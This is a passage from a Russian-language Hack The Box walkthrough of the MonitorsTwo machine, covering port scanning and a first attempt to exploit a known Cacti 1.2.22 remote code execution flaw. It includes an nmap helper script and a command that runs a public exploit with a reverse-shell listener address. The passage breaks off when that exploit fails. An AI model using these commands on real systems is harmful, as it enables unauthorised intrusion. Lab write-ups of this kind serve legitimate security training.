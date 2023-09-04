В этом рай­тапе мы с тобой под­нимем при­виле­гии в кон­тей­нере Docker, затем совер­шим побег из него и заюзаем CVE-2021-41091 для зах­вата рута на хос­товой машине. Но сна­чала нуж­но будет взло­мать сайт и про­экс­плу­ати­ровать уяз­вимость в движ­ке Cacti.

Про­делы­вать все это мы будем в рам­ках про­хож­дения тре­ниро­воч­ной машины MonitorsTwo с пло­щад­ки Hack The Box. Уро­вень ее слож­ности — лег­кий.

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

До­бав­ляем IP-адрес машины в / etc/ hosts :

10. 10. 11. 211 monitorstwo. htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та: #!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr '\ n' ', ' | sed s/, $/ / ) nmap -p $ports -A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

Ска­нер находит нам два откры­тых пор­та: 22 — служ­ба OpenSSH 8.2p1 и 80 — веб‑сер­вер Nginx 1.18.0.

Сра­зу перехо­дим к сай­ту и видим там фор­му авто­риза­ции.

Ни­же ука­зана вер­сия CMS Cacti — 1.2.22.

Точка входа

Пер­вым делом сто­ит про­верить, есть ли для обна­ружен­ного движ­ка уже готовые экс­пло­иты. Если ты, как и я, исполь­зуешь Kali Linux, то база экс­пло­итов ExploitDB у тебя уже есть под рукой. Дос­таточ­но выз­вать ути­литу SearchSploit и ука­зать клю­чевое сло­во.

searchsploit Cacti

Ви­дим, что есть экс­пло­ит для под­ходящей вер­сии Cacti. Он дол­жен дать нам воз­можность уда­лен­ного выпол­нения кода (RCE). Пос­мотрим, какая есть допол­нитель­ная информа­ция об экс­пло­ите.

searchsploit -p php/ webapps/ 51166. py

Прис­тупа­ем к экс­плу­ата­ции. Сна­чала запус­тим лис­тенер pwncat-cs для получе­ния реверс‑шел­ла. А затем и сам экс­пло­ит:

python3 51166. py -u http:/ / 10. 10. 11. 211 -p 10. 10. 14. 111 -i 4321

Но в ответ ничего не получа­ем. Видимо, у нас нет дос­тупа к нуж­ному эндпо­инту API. Что ж, при­дет­ся дей­ство­вать вруч­ную. Откры­ваем код экс­пло­ита и про­буем пов­торить шаги.